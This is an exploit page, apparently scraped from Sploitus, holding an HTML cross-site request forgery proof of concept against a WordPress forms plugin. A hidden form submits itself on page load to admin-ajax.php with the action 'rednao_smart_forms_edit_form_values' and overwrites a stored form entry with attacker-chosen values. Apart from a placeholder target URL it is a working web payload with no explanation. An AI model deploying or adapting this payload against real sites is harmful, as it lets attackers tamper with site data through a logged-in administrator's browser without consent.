Share
## https://sploitus.com/exploit?id=WPEX-ID:C7CE2649-B2B0-43F4-994D-07B1023405E9
<!DOCTYPE html>
<html lang="en">
<head>
<meta charset="UTF-8">
<meta name="viewport" content="width=device-width, initial-scale=1.0">
<title>CSRF PoC</title>
</head>
<body>
<h1>CSRF PoC</h1>
<form id="csrfForm" action="https://YOUR-WEBSITE-URL/wp-admin/admin-ajax.php" method="post" style="display: none;">
<input type="hidden" name="action" value="rednao_smart_forms_edit_form_values">
<input type="hidden" name="entryId" value="7">
<input type="hidden" name="entryString" value="{"rnField1":{"value":"Mr Hacker"},"rnField2":{"value":"mehdi@mtest.com"},"rnField3":{"value":"SUCCESSFUL FIELD HACK"}}">
<input type="hidden" name="elementOptions" value="[{"_id":35,"ClassName":"rednaotextinput","IsRequired":"n","Formulas":{},"Styles":{},"ContainerOptions":{"Width":-1,"Id":"35","Type":"single"},"Id":"rnField1","Spacing":"col-sm-12","Label":"Name","Placeholder":"","Value":"","ReadOnly":"n","Width":"","Icon":{"ClassName":""},"CustomCSS":"","Placeholder_Icon":{"ClassName":"","Orientation":""},"_Selected":true},{"_id":36,"ClassName":"rednaoemail","IsRequired":"n","Formulas":{},"Styles":{},"ContainerOptions":{"Width":-1,"Id":"37","Type":"single"},"Id":"rnField2","Spacing":"col-sm-12","Label":"Email","Placeholder":"","Icon":{"ClassName":""},"CustomCSS":"","Placeholder_Icon":{"ClassName":"","Orientation":""},"Value":"","ReadOnly":"n","_Selected":true},{"_id":37,"ClassName":"rednaotextarea","IsRequired":"n","Formulas":{},"Styles":{},"ContainerOptions":{"Width":-1,"Id":"39","Type":"single"},"Id":"rnField3","Spacing":"col-sm-12","Label":"Message","DefaultText":"","Value":"","Width":"","Height":"","Placeholder":"","Disabled":"n","MaxLength":"","CustomCSS":"","Placeholder_Icon":{"ClassName":"","Orientation":""},"_Selected":true},{"_id":38,"ClassName":"rednaosubmissionbutton","IsRequired":"n","Formulas":{},"Styles":{},"ContainerOptions":{"Width":-1,"Id":"41","Type":"single"},"Id":"rnField4","Spacing":"col-sm-12","ButtonText":"Send","CustomCSS":"","Icon":{"ClassName":"glyphicon glyphicon-send","Orientation":"Add"},"Animated":"y","Action":"submit","_Selected":true}]">
</form>
<script>
// Automatically submit the form when the page loads
document.getElementById('csrfForm').submit();
</script>
</body>
</html>